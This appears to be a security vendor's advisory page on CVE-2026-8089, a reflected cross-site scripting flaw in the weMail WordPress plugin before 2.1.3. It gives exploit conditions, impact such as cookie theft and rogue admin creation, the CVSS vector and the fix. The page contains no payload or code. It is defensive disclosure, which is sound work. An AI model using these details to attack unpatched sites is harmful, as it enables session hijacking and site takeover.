How is CVE-2026-8089 exploited?

Network reachability (required): The attacker delivers the crafted URL over the network, so the vulnerable AJAX endpoint must be reachable from the internet or an accessible network path. Authentication (not-required): No account or credential is needed on the attacker's side; the plugin reflects the malicious parameter without any privilege check. Victim interaction (required): A logged-in user (including an administrator) must follow or load the attacker-crafted URL for the injected script to execute in their browser session. Attack complexity (info): The exploit is reliable and condition-free once the victim loads the URL; no race conditions or special environmental factors are required.

What is the impact of CVE-2026-8089?

Attacker-controlled JavaScript executes in the victim's authenticated browser session, enabling theft of session cookies or authentication tokens. The injected script can read and exfiltrate page content visible to the victim, including sensitive administrative data or subscriber records managed through weMail. Because the attack works against administrators, the script can issue privileged WordPress actions on the victim's behalf, such as creating rogue admin accounts or modifying plugin settings. Integrity of displayed page content is compromised for the duration of the attack, and availability of the victim's session may be disrupted if the payload redirects or locks the user out.

Back to search

HIGHCVE-2026-8089Published 2026-06-17Modified 2026-06-17CNA WPScan

CVE-2026-8089: weMail < 2.1.3 - Reflected Cross-Site Scripting

Q: What is CVE-2026-8089?

Reflected Cross-Site Scripting (XSS) affects the weMail WordPress plugin (Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce) in all versions before 2.1.3. The vulnerability is reachable over the network with no authentication required on the attacker's side, but requires a victim who is already logged in to click or load a crafted URL. Successful exploitation injects attacker-controlled script into the victim's browser session, enabling session hijacking, credential theft, or unauthorized actions performed as the victim, including administrator-level operations. A patched-image rebuild at version 2.1.3 is available on HarborGuard for environments running an affected version.

Q: How is CVE-2026-8089 fixed?

A patched-image rebuild pinned to weMail 2.1.3 becomes available on HarborGuard once the fix version is confirmed, which it is for this CVE. For customers with auto-remediation enabled, HarborGuard triggers a rebuild, runs regression tests against the updated image, and opens a pull request against affected workloads automatically.

The weMail: Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce WordPress plugin before 2.1.3 does not properly escape a user-supplied parameter before reflecting it into an HTML attribute on a non-nonce-protected AJAX response, allowing unauthenticated attackers to deliver Reflected Cross-Site Scripting against any authenticated user (including administrators) via a crafted URL.

CVSS v3.1: 7.1
Severity: HIGH
Fixed in: 2.1.3
Affected Products: 1

HarborGuard Analysis

Synopsis

Reflected Cross-Site Scripting (XSS) affects the weMail WordPress plugin (Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce) in all versions before 2.1.3. The vulnerability is reachable over the network with no authentication required on the attacker's side, but requires a victim who is already logged in to click or load a crafted URL. Successful exploitation injects attacker-controlled script into the victim's browser session, enabling session hijacking, credential theft, or unauthorized actions performed as the victim, including administrator-level operations. A patched-image rebuild at version 2.1.3 is available on HarborGuard for environments running an affected version.

HarborGuard Coverage

Detection

Detection of CVE-2026-8089 is available across every HarborGuard environment: the CVE is ingested from upstream feeds (including WPScan) within minutes of publication and matched against customer images, including custom-built WordPress images that bundle the weMail plugin. Any image whose embedded plugin version falls below 2.1.3 is flagged automatically.

Available

Triage

HarborGuard scores this finding at CVSS 7.1 HIGH and weights it against each environment's compliance policy to determine urgency and routing. Alerts are directed to the appropriate team inbox within each customer org based on configured ownership rules, so the right people receive the finding without manual triage steps.

Available

Patch

A patched-image rebuild pinned to weMail 2.1.3 becomes available on HarborGuard once the fix version is confirmed, which it is for this CVE. For customers with auto-remediation enabled, HarborGuard triggers a rebuild, runs regression tests against the updated image, and opens a pull request against affected workloads automatically.

Available

Exploit Conditions

Network reachabilityRequired
The attacker delivers the crafted URL over the network, so the vulnerable AJAX endpoint must be reachable from the internet or an accessible network path.
AuthenticationNot required
No account or credential is needed on the attacker's side; the plugin reflects the malicious parameter without any privilege check.
Victim interactionRequired
A logged-in user (including an administrator) must follow or load the attacker-crafted URL for the injected script to execute in their browser session.
Attack complexityDetail
The exploit is reliable and condition-free once the victim loads the URL; no race conditions or special environmental factors are required.

Blast Radius

Attacker-controlled JavaScript executes in the victim's authenticated browser session, enabling theft of session cookies or authentication tokens.
The injected script can read and exfiltrate page content visible to the victim, including sensitive administrative data or subscriber records managed through weMail.
Because the attack works against administrators, the script can issue privileged WordPress actions on the victim's behalf, such as creating rogue admin accounts or modifying plugin settings.
Integrity of displayed page content is compromised for the duration of the attack, and availability of the victim's session may be disrupted if the payload redirects or locks the user out.

How HarborGuard Handles This

Available on HarborGuard: detection of this CVE is matched against every customer image within minutes of publication, with no manual configuration required to cover custom-built WordPress images that bundle weMail. For environments running a version below 2.1.3, a rebuilt image at the patched version is available. Where compliance policy permits auto-remediation, HarborGuard performs the rebuild, executes a regression-test run against the updated image, and opens a pull request against affected workloads; median time from CVE publication to merged patch PR for high-severity issues is around 90 minutes for environments with auto-remediation enabled. For environments where auto-remediation is not enabled, the finding is routed to the configured owner inbox with CVSS 7.1 HIGH scoring and policy weighting applied, so teams can prioritize and act on the upgrade to 2.1.3 manually.

See how HarborGuard automates this

Fix available

2.1.3

Affected packages

Unknown / weMail: Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce
< 2.1.3 (from 0)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

References

wpscan.com

Metrics

Get notified

HarborGuard Analysis

Synopsis

HarborGuard Coverage

Exploit Conditions

Blast Radius

How HarborGuard Handles This

Fix available